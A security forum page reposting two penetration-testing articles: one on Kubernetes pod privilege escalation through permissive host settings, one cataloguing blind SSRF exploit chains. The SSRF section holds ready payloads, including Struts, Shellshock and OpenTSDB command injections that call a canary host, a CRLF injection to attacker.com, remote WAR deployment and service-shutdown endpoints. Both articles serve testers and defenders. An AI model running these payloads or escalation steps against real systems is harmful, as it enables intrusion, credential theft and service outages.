  1. General information

    1. Important announcements

      Important announcements and forum rules. Read the rules before posting.

    2. Welcome

      Welcome to the Romanian Security Team forum; you can introduce yourself here (optional)

    3. RST projects

      Here you will find all the programs, tutorials, methods, and exploits created by RST members

  2. Technical section

    1. Exploits

      The newest exploits, PoCs, and shellcodes

    2. Challenges (CTF)

      Challenges and wargames, for CTF enthusiasts

    3. Bug Bounty

      Category for discussions about sites running a bug bounty program that rewards people who report vulnerabilities

    4. Programming

      The programmers' corner: C/C++, Visual Basic, .NET, Java, ASM, shell scripting, Perl, Python

    5. Web security

      Tutorials and discussions on web application security

    6. Reverse engineering & exploit development

      Tutorials on malware analysis, samples, source code, useful programs, reverse engineering, and exploit development

    7. Mobile security

      Discussions about mobile phones, rooting, jailbreaking, etc.

    8. Operating systems and hardware discussions

      Discussions about hardware, Windows, Unix, BSD, etc.

    9. Electronics

      General discussions about electronics

    10. Wireless Pentesting

      Wardriving area; WiFi, Bluetooth, and GSM hacking

    11. Black SEO & monetization

      Tips & tricks, questions, monetization

  3. Programs

    1. Hacking programs

      Post utilities here such as sniffers, bruteforcers, fuzzers, etc. Do not make requests here.

    2. Security programs

      Post programs here such as firewalls, antiviruses, and similar software

    3. Useful programs

      Programs that do not fit the other sections: hacking or security

    4. Free stuff

      Various useful things, excluding roots, SMTPs, VPSes, etc.

  4. General discussions

    1. RST Market

      Any sale or purchase related to online/banking fraud or unauthorized access is punished with a permanent ban! A minimum of 50 posts is required for access!

    2. Off-topic

      Discussions on various topics that do not fit the other categories. IT-related discussions only!

    3. Beginner discussions

      If you are a beginner, have a simple question, or want to learn more about a field, this is the right section

    4. Security news

      News from the IT security field

    5. Links

      Post only security-related links here!

    6. Trash bin

      All topics that have gone off-topic will be moved here.


    • Bad Pods: Kubernetes Pod Privilege Escalation

Seth Art on Jan 19, 2021 5:26:38 AM

What are the risks associated with overly permissive pod creation in Kubernetes? The answer varies based on which of the host's namespaces and security contexts are allowed. In this post, I will describe eight insecure pod configurations and the corresponding methods to perform privilege escalation. This article and the accompanying repository were created to help penetration testers and administrators better understand common misconfiguration scenarios.

If you are an administrator, I hope that this post gives you the confidence to apply restrictive controls around pod creation by default. I also hope it helps you consider isolating any pods that need access to the host's resources to a namespace that is only accessible to administrators, following the principle of least privilege. If you are a penetration tester, I hope this post provides you with some ideas on how to demonstrate the impact of an overly permissive pod security policy, and that the repository gives you some easy-to-use manifests and actionable steps to achieve those goals.

Executive Summary:

One of the foundations of information security is the "principle of least privilege": every user, system process, or application should operate with the smallest set of privileges required to do its task. When privileges greatly exceed what is required, attackers can take advantage of the excess to access sensitive data, compromise systems, or escalate those privileges to conduct lateral movement in a network. Kubernetes and other new "DevOps" technologies are complex to implement properly and are often deployed misconfigured or with more permissions than necessary.

The lesson, as we have demonstrated with our "Bad Pods" research, is that if you are using Kubernetes in your infrastructure, you need to find out from your development team how they are configuring and hardening this environment.

HARDENING PODS: HOW RISKY CAN A SINGLE ATTRIBUTE BE?

When it comes to Kubernetes security best practices, every checklist worth its salt mentions that you should use the principle of least privilege when provisioning pods. But how can we enforce granular security controls, and how do we evaluate the risk of each attribute?

A Kubernetes administrator can enforce the principle of least privilege using admission controllers. For example, there's a built-in Kubernetes controller called PodSecurityPolicy and also a popular third-party admission controller called OPA Gatekeeper. Admission controllers allow you to deny a pod entry into the cluster if it has more permissions than the policy allows. However, even though the controls exist to define and enforce policy, the real-world security implications of allowing each specific attribute are not always understood, and quite often pod creation is not as locked down as it needs to be.

As a penetration tester, you might find yourself with access to create pods on a cluster where there is no policy enforcement. This is what I like to refer to as "easy mode." Use this manifest from Rory McCune (@raesene), this command from Duffie Cooley (@mauilion), or the node-shell krew plugin, and you will have fully interactive privileged code execution on the underlying host. It doesn't get easier than that!

But what if you can create a pod with just hostNetwork, hostPID, hostIPC, hostPath, or privileged? What can you do in each case? Let's take a look!

BAD PODS - ATTRIBUTES AND THEIR WORST-CASE SECURITY IMPACT

The pods below are loosely ordered from highest to lowest security impact. Note that the generic attack paths that could affect any Kubernetes pod (e.g., checking to see if the pod can access the cloud provider's metadata service or identifying misconfigured Kubernetes RBAC) are covered in Bad Pod #8: Nothing allowed.

THE BAD PODS LINEUP

Bad Pod #1: Everything allowed
Bad Pod #2: Privileged and hostPid
Bad Pod #3: Privileged only
Bad Pod #4: hostPath only
Bad Pod #5: hostPid only
Bad Pod #6: hostNetwork only
Bad Pod #7: hostIPC only
Bad Pod #8: Nothing allowed

BAD POD #1: EVERYTHING ALLOWED

What's the worst that can happen? Multiple paths to full cluster compromise.

How? The pod you create mounts the host's filesystem to the pod. You'll have the best luck if you can schedule your pod on a control-plane node using the nodeName selector in your manifest. You then exec into your pod and chroot to the directory where you mounted the host's filesystem. You now have root on the node running your pod.

Read secrets from etcd — If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains the configuration for the cluster, including all secrets.

Hunt for privileged service account tokens — Even if you can only schedule your pod on a worker node, you can also access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod with a mounted token bound to a service account that is bound to a clusterrolebinding, giving you access to do things like create pods or view secrets in all namespaces.

Some additional privilege escalation patterns are outlined in the README document linked below and also in Bad Pod #4: hostPath.
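To make the "everything allowed" configuration concrete, here is a rough sketch of such a pod spec built as a Python dict (field names follow the Kubernetes pod spec; the image, names, and nodeName are placeholders of mine, and the real manifests live in the badPods repository linked below):

```python
import json

# Sketch of an "everything allowed" pod: all host namespaces shared,
# privileged security context, and the host's root filesystem mounted.
# Image/node names are placeholders; the badPods repo has real manifests.
everything_allowed = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "everything-allowed"},
    "spec": {
        "hostNetwork": True,   # share the host's network namespace
        "hostPID": True,       # share the host's PID namespace
        "hostIPC": True,       # share the host's IPC namespace
        "nodeName": "control-plane-node",  # try to land on a control-plane node
        "containers": [{
            "name": "everything-allowed",
            "image": "ubuntu",
            "command": ["sleep", "infinity"],
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "host-root", "mountPath": "/host"}],
        }],
        "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
    },
}

if __name__ == "__main__":
    print(json.dumps(everything_allowed, indent=2))
```

After applying a manifest like this, you exec into the pod and chroot to /host to get root on the node, as described above.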
Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/everything-allowed

References and further reading
The Most Pointless Kubernetes Command Ever
Secure Kubernetes - KubeCon NA 2019 CTF
Deep Dive into Real-World Kubernetes Threats
Compromising Kubernetes Cluster by Exploiting RBAC Permissions (slides)
The Path Less Traveled: Abusing Kubernetes Defaults & Corresponding Repo

BAD POD #2: PRIVILEGED AND HOSTPID

What's the worst that can happen? Multiple paths to full cluster compromise.

How? In this scenario, the only thing that changes from the everything-allowed pod is how you gain root access to the host. Rather than chrooting to the host's filesystem, you can use nsenter to get a root shell on the node running your pod.

Why does it work?

Privileged — The privileged: true container-level security context breaks down almost all the walls that containers are supposed to provide; however, the PID namespace is one of the few walls that stands. Without hostPID, nsenter would only work to enter the namespaces of a process running within the container. For more examples of what you can do if you only have privileged: true, refer to the next example, Bad Pod #3: Privileged only.

Privileged + hostPID — When both hostPID: true and privileged: true are set, the pod can see all of the processes on the host, and you can enter the init system (PID 1) on the host. From there, you can execute your shell on the node.

Once you are root on the host, the privilege escalation paths are all the same as described in Bad Pod #1: Everything allowed.

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/priv-and-hostpid

References and further reading
Duffie Cooley's Nsenter Pod Tweet
The Path Less Traveled: Abusing Kubernetes Defaults & Corresponding Repo
Node-shell Krew Plugin

BAD POD #3: PRIVILEGED ONLY

What's the worst that can happen? Multiple paths to full cluster compromise.

How?
If you only have privileged: true, there are two paths you can take:

Mount the host's filesystem — In privileged mode, /dev on the host is accessible in your pod. You can mount the disk that contains the host's filesystem into your pod using the mount command. In my experience, though, this gives you a limited view of the filesystem: some files, and therefore privesc paths, are not accessible from your privileged pod unless you escalate to a full shell on the node. That said, it is easy enough that you might as well mount the device and see what you can see.

Exploit cgroup user mode helper programs — Your best bet is to get interactive root access on the node, but you must jump through a few hoops first. You can use Felix Wilhelm's exploit PoC undock.sh to execute one command at a time, or you can use Brandon Edwards and Nick Freeman's version from their talk A Compendium of Container Escapes, which forces the host to connect back to a listener on the pod for an easy upgrade to interactive root access on the host. Another option is to use the Metasploit module Docker Privileged Container Escape, which uses the same exploit to upgrade a shell received from a container to a shell on the host.

Whichever option you choose, the Kubernetes privilege escalation paths are largely the same as in Bad Pod #1: Everything allowed.

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/priv

References and further reading
Felix Wilhelm's Cgroup Usermode Helper Exploit
Understanding Docker Container Escapes
A Compendium of Container Escapes
Docker Privileged Container Escape Metasploit Module

BAD POD #4: HOSTPATH ONLY

What's the worst that can happen? Multiple paths to full cluster compromise.

How?
In this case, even if you don't have access to the host's process or network namespaces, if the administrators have not limited what you can mount, you can mount the entire host's filesystem into your pod, giving you read/write access on the host's filesystem. This allows you to execute most of the same privilege escalation paths outlined above. There are so many paths available that Ian Coldwater and Duffie Cooley gave an awesome Black Hat 2019 talk about it, titled "The Path Less Traveled: Abusing Kubernetes Defaults!"

Here are some privilege escalation paths that apply any time you have access to a Kubernetes node's filesystem:

Look for kubeconfig files on the host filesystem — If you are lucky, you will find a cluster-admin config with full access to everything.

Access the tokens from all pods on the node — Use something like kubectl auth can-i --list or access-matrix to see if any of the pods have tokens that give you more permissions than you currently have. Look for tokens that have permissions to get secrets or create pods, deployments, etc. in kube-system, or that allow you to create clusterrolebindings.

Add your SSH key — If you have network access to SSH to the node, you can add your public key to the node and SSH to it for full interactive access.

Crack hashed passwords — Crack hashes in /etc/shadow; see if you can use them to access other nodes.

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/hostpath

References and further reading
The Path Less Traveled: Abusing Kubernetes Defaults & Corresponding Repo
Secure Kubernetes - KubeCon NA 2019 CTF
Deep Dive into Real-World Kubernetes Threats
Compromising Kubernetes Cluster by Exploiting RBAC Permissions (slides)

BAD POD #5: HOSTPID ONLY

What's the worst that can happen? Application or cluster credential leaks if an application in the cluster is configured incorrectly; denial of service via process termination.

How?
There's no clear path to get root on the node with only hostPID, but there are still some good post-exploitation opportunities.

View processes on the host — When you run ps from within a pod that has hostPID: true, you see all the processes running on the host, including processes running in each pod.

Look for passwords, tokens, keys, etc. — If you are lucky, you will find credentials that you can use to escalate privileges in the cluster, to services supported by the cluster, or to services that communicate with cluster-hosted applications. It's a long shot, but you might find a Kubernetes service account token or some other authentication material that will allow you to access other namespaces and eventually escalate all the way to cluster admin.

Kill processes — You can also kill any process on the node (presenting a denial-of-service risk). Because of this risk, though, I would advise against it on a penetration test!

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/hostpid

BAD POD #6: HOSTNETWORK ONLY

What's the worst that can happen? Potential path to cluster compromise.

How? If you only have hostNetwork: true, you can't get privileged code execution on the host directly, but if you cross your fingers, you might still find a path to cluster admin. There are three potential escalation paths:

Sniff traffic — You can use tcpdump to sniff unencrypted traffic on any interface on the host. You might get lucky and find service account tokens or other sensitive information transmitted over unencrypted channels.

Access services bound to localhost — You can also reach services that only listen on the host's loopback interface or that are otherwise blocked by network policies. These services might turn into a fruitful privilege escalation path.
Bypass network policy — If a restrictive network policy is applied to the namespace, deploying a pod with hostNetwork: true allows you to bypass the restrictions. This works because you are bound to the host's network interfaces, not the pod's.

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/hostnetwork

BAD POD #7: HOSTIPC ONLY

What's the worst that can happen? Ability to access data used by any pods that also use the host's IPC namespace.

How? If any process on the host, or any process in a pod, uses the host's inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), you'll be able to read from and write to those same mechanisms. The first place you'll want to look is /dev/shm, as it is shared between any pod with hostIPC: true and the host. You'll also want to check out the other IPC mechanisms with ipcs.

Inspect /dev/shm — Look for any files in this shared memory location.

Inspect existing IPC facilities — You can check to see if any IPC facilities are being used with /usr/bin/ipcs.

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/hostipc

BAD POD #8: NOTHING ALLOWED

What's the worst that can happen? Multiple potential paths to full cluster compromise.

How? To close our Bad Pods lineup, there are plenty of attack paths that should be investigated any time you can create a pod or simply have access to a pod, even if there are no security attributes enabled. Here are some things to look for whenever you have access to a Kubernetes pod:

Accessible cloud metadata — If the pod is cloud hosted, try to access the cloud metadata service. You might get access to the IAM credentials associated with the node or even find a cloud IAM credential created specifically for that pod. In either case, this can be your path to escalate in the cluster, in the cloud environment, or in both.
Overly permissive service accounts — If the namespace's default service account is mounted to /var/run/secrets/kubernetes.io/serviceaccount/token in your pod and is overly permissive, use that token to further escalate your privileges within the cluster.

Misconfigured Kubernetes components — If either the apiserver or the kubelets have anonymous-auth set to true and there are no network policy controls preventing it, you can interact with them directly without authentication.

Kernel, container engine, or Kubernetes exploits — An unpatched vulnerability in the underlying kernel, in the container engine, or in Kubernetes can potentially allow a container escape or access to the Kubernetes cluster without any additional permissions.

Hunt for vulnerable services — Your pod will likely see a different view of the network services running in the cluster than you can see from the machine you used to create the pod. You can hunt for vulnerable services and applications by proxying your traffic through the pod.

Usage and exploitation examples
https://github.com/BishopFox/badPods/tree/main/manifests/nothing-allowed

References and further reading
Secure Kubernetes - KubeCon NA 2019 CTF
Kubernetes Goat
Attacking Kubernetes through Kubelet
Deep Dive into Real-World Kubernetes Threats
A Compendium of Container Escapes
CVE-2020-8558 POC

CONCLUSION

Apart from the Bad Pod #8: Nothing allowed example, all of the privilege escalation paths covered in this blog post (and the respective repository) can be mitigated with restrictive pod security policies.
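As a rough illustration of what a restrictive policy checks, here is a minimal sketch of the kind of screening an admission controller such as PodSecurityPolicy or OPA Gatekeeper performs on a pod spec. This is illustrative only: real policy engines evaluate far more fields than the five risky attributes discussed in this post.

```python
# Flag the risky pod-spec attributes covered in the Bad Pods lineup.
# Illustrative sketch only; real admission controllers (PodSecurityPolicy,
# OPA Gatekeeper) evaluate many more fields and act at admission time.
def risky_attributes(pod: dict) -> list:
    spec = pod.get("spec", {})
    findings = []
    # Host namespace sharing (Bad Pods #2, #5, #6, #7)
    for ns in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(ns):
            findings.append(ns)
    # Privileged containers (Bad Pods #2, #3)
    for c in spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append("privileged container: " + c.get("name", "?"))
    # hostPath volumes (Bad Pod #4)
    for v in spec.get("volumes", []):
        if "hostPath" in v:
            findings.append("hostPath volume: " + str(v["hostPath"].get("path")))
    return findings
```

A policy engine would deny admission whenever this list is non-empty (or not explicitly allow-listed for an administrator-only namespace).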
Additionally, there are many other defense-in-depth security controls available to Kubernetes administrators that can reduce the impact of, or completely thwart, certain attack paths even when an attacker has access to some or all of the host namespaces and capabilities (e.g., disabling the automatic mounting of service account tokens, or requiring all pods to run as non-root by enforcing MustRunAsNonRoot=true and allowPrivilegeEscalation=false). As is always the case with penetration testing, your mileage may vary. Administrators are sometimes hard pressed to defend security best practices without examples that demonstrate the security implications of risky configurations. I hope the examples laid out in this post and the manifests contained in the Bad Pods repository help you enforce the principle of least privilege when it comes to Kubernetes pod creation in your organization.

Source: https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation
    • Introduction

What is Server Side Request Forgery (SSRF)? Server Side Request Forgery occurs when you can coerce a server to make arbitrary requests on your behalf. As the requests are being made by the server, it may be possible to access internal resources due to where the server is positioned in the network. On cloud environments, SSRF poses a more significant risk due to the presence of metadata endpoints that may contain sensitive credentials or secrets.

Blind SSRF

When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. In the industry, this behaviour is often referred to as "Blind SSRF". In such situations, how do we prove impact? This was an interesting discussion sparked by Justin Gardner on Twitter: if you can reach internal resources, there are a number of potential exploit chains that can be executed to prove impact. This blog post attempts to go into detail for each known exploit chain when leveraging blind SSRF, and will be updated as more techniques are discovered and shared. If we've missed any techniques, please send us a tweet or a DM (@assetnote) and we'll add it to this blog.

SSRF Canaries

In order to validate that you can interact with internal services or applications, you can utilise "SSRF canaries": requesting an internal URL that performs another SSRF and calls out to your canary host. If you receive a request to your canary host, it means that you have successfully hit an internal service that is also capable of making outbound requests. This is an effective way to verify that an SSRF vulnerability has access to internal networks or applications, and also to verify the presence of certain software on the internal network. You can also potentially pivot to more sensitive parts of an internal network using an SSRF canary, depending on where it sits.
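A canary host can be as simple as a listener that records every inbound request. The following standalone sketch uses Python's http.server purely for illustration; in practice you would use a purpose-built service such as Burp Collaborator or interactsh.

```python
# Minimal SSRF canary: record every request that reaches this host.
# Illustration only; real engagements use Burp Collaborator, interactsh, etc.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

hits = []  # (client_ip, path) for every callback received


class CanaryHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        # silence the default stderr request logging
        pass


def start_canary(port: int = 0) -> HTTPServer:
    """Start the canary on a background thread; port 0 picks a free port."""
    server = HTTPServer(("0.0.0.0", port), CanaryHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Any entry appearing in `hits` proves that the internal service you targeted followed your URL out to the canary.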
Using DNS datasources and AltDNS to find internal hosts

With the goal being to find as many internal hosts as possible, DNS datasources can be utilised to find all records that point to internal hosts. On cloud environments, we often see ELBs pointing to hosts inside an internal VPC. Depending on which VPC the asset you're targeting is in, it may be possible to access other hosts within the same VPC. For example, consider the following host discovered from DNS datasources:

livestats.target.com -> internal-es-livestats-298228113.us-west-2.elb.amazonaws.com

You can make an assumption that the es stands for Elasticsearch, and then perform further attacks on this host. You can also spray all of these blind SSRF payloads across all of the "internal" hosts identified through this method. This is often effective. To find more internal hosts, I recommend taking all of your DNS data and then using something like AltDNS to generate permutations, then resolving them with a fast DNS bruteforcer. Once this is complete, identify all of the newly discovered internal hosts and use them as part of your blind SSRF chain.

Side Channel Leaks

When exploiting blind SSRF vulnerabilities, you may be able to leak some information about the response being returned. For example, say you have blind SSRF via an XXE; the error messages may indicate whether or not a response was returned:

Error parsing request: System.Xml.XmlException: Expected DTD markup was not found. Line 1, position 1.

vs. the host and port being unreachable:

Error parsing request: System.Net.WebException: Unable to connect to the remote server

Similarly, outside of XXEs, a web application could also have a side channel leak that can be ascertained by inspecting differences within the:

Response status code: an online internal asset:port responds with 200 OK vs. an offline internal asset:port with 500 Internal Server Error.
Response contents: the response size in bytes is smaller or bigger depending on whether or not the URL you are trying to request is reachable.
Response timing: the response times are slower or faster depending on whether or not the URL you are trying to request is reachable.

Techniques

Possible via HTTP(S): Elasticsearch, Weblogic, Hashicorp Consul, Shellshock, Apache Druid, Apache Solr, PeopleSoft, Apache Struts, JBoss, Confluence, Jira, Other Atlassian Products, OpenTSDB, Jenkins, Hystrix Dashboard, W3 Total Cache, Docker, Gitlab Prometheus Redis Exporter

Possible via Gopher: Redis, Memcache, Apache Tomcat

Tools: Gopherus, SSRF Proxy

Possible via HTTP(s)

Elasticsearch

Commonly bound port: 9200

When Elasticsearch is deployed internally, it usually does not require authentication. If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200:

/_cluster/health
/_cat/indices
/_cat/health

If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following paths. Note: the _shutdown API has been removed from Elasticsearch version 2.x and up.
This only works in Elasticsearch 1.6 and below:

/_shutdown
/_cluster/nodes/_master/_shutdown
/_cluster/nodes/_shutdown
/_cluster/nodes/_all/_shutdown

Weblogic

Commonly bound ports: 80, 443 (SSL), 7001, 8888

SSRF Canary: UDDI Explorer (CVE-2014-4210)

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded

operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

This also works via GET:

http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

This endpoint is also vulnerable to CRLF injection:

GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0
Host: vuln.weblogic
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close

Will result in the following request:

root@mail:~# nc -lvp 4000
Listening on [] (family 0, port 4000)
Connection from example.com 43111 received!
POST /exp HTTP/1.11
X-CLRF: Injected HTTP/1.1
Content-Type: text/xml; charset=UTF-8
soapAction: ""
Content-Length: 418
User-Agent: Java1.6.0_24
Host: attacker.com:4000
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: Keep-Alive

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><env:Envelope xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><env:Header/><env:Body><find_business generic="2.0" xmlns="urn:uddi-org:api_v2"><name>sdf</name></find_business></env:Body></env:Envelope>

SSRF Canary: CVE-2020-14883

Taken from here.

Linux:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")

Windows:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
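Stepping back to the side-channel signals described earlier (status code, response size, timing), they can be folded into a small classifier when triaging many blind probes. This is a sketch of my own; the thresholds are arbitrary placeholders that you would calibrate per target against a known-unreachable baseline.

```python
# Classify a blind SSRF probe from side-channel signals alone.
# Thresholds are placeholders; calibrate them per target against a
# baseline response for a known-unreachable host:port.
def classify_probe(status: int, size: int, elapsed: float,
                   baseline_size: int, timeout: float = 5.0) -> str:
    if elapsed >= timeout:
        return "unreachable (timed out)"
    if status >= 500:
        return "unreachable (server error)"
    if abs(size - baseline_size) > 50:  # body noticeably differs from baseline
        return "reachable (size differs from baseline)"
    return "inconclusive"
```

Running every (host, port) probe result through a function like this quickly surfaces which internal endpoints are alive.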
Hashicorp Consul

Commonly bound ports: 8500, 8501 (SSL)

Writeup can be found here.

Shellshock

Commonly bound ports: 80, 443 (SSL), 8080

In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying:

Short list of CGI paths to test: Gist containing paths.

SSRF Canary: Shellshock via User Agent

User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY

Apache Druid

Commonly bound ports: 80, 8080, 8888, 8082

See the API reference for Apache Druid here. If you can view the status code, check the following paths to see if they return a 200 status code:

/status/selfDiscovered/status
/druid/coordinator/v1/leader
/druid/coordinator/v1/metadata/datasources
/druid/indexer/v1/taskStatus

Shutdown tasks (requires you to guess task IDs or the datasource name):

/druid/indexer/v1/task/{taskId}/shutdown
/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks

Shutdown supervisors on Apache Druid Overlords:

/druid/indexer/v1/supervisor/terminateAll
/druid/indexer/v1/supervisor/{supervisorId}/shutdown

Apache Solr

Commonly bound port: 8983

SSRF Canary: Shards Parameter

Taken from here.

/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
/xxx?q=aaa%26shards=http://SSRF_CANARY/solr
/xxx?q=aaa&shards=http://SSRF_CANARY/solr

SSRF Canary: Solr XXE (2017)

Apache Solr 7.0.1 XXE (Packetstorm)

/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'><a></a>'
/xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'><a></a>"}

RCE via dataImportHandler

Research on RCE via dataImportHandler

PeopleSoft

Commonly bound ports: 80, 443 (SSL)

Taken from this research here.

SSRF Canary: XXE #1

POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<?xml version="1.0"?>
<!DOCTYPE IBRequest [
<!ENTITY x SYSTEM "http://SSRF_CANARY">
]>
<IBRequest>
  <ExternalOperationName>&x;</ExternalOperationName>
  <OperationType/>
  <From>
    <RequestingNode/>
    <Password/>
    <OrigUser/>
    <OrigNode/>
    <OrigProcess/>
    <OrigTimeStamp/>
  </From>
  <To>
    <FinalDestination/>
    <DestinationNode/>
    <SubChannel/>
  </To>
  <ContentSections>
    <ContentSection>
      <NonRepudiation/>
      <MessageVersion/>
      <Data><![CDATA[<?xml version="1.0"?>your_message_content]]></Data>
    </ContentSection>
  </ContentSections>
</IBRequest>

SSRF Canary: XXE #2

POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...

<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">

Apache Struts

Commonly bound ports: 80, 443 (SSL), 8080, 8443 (SSL)

Taken from here.

SSRF Canary: Struts2-016:

Append this to the end of every internal endpoint/URL you know of:

?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

JBoss

Commonly bound ports: 80, 443 (SSL), 8080, 8443 (SSL)

Taken from here.
SSRF Canary: Deploy WAR from URL

/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war

Confluence

Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)

SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older)

/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/

SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)

Atlassian Security Ticket OAUTH-344

/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY

Jira

Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)

SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)

Atlassian Security Ticket OAUTH-344

/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY

SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)

Atlassian Security Ticket JRASERVER-69793

/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com

Other Atlassian Products

Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)

SSRF Canary: iconUriServlet (CVE-2017-9506):
Bamboo < 6.0.0
Bitbucket < 4.14.4
Crowd < 2.11.2
Crucible < 4.3.2
Fisheye < 4.3.2

Atlassian Security Ticket OAUTH-344

/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY

OpenTSDB

Commonly bound port: 4242

OpenTSDB Remote Code Execution

SSRF Canary: curl via RCE

/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png

Jenkins

Commonly bound ports: 80,443 (SSL),8080,8888

Great writeup here.

SSRF Canary: CVE-2018-1000600

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai

RCE

Follow the instructions here to achieve RCE via GET: Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
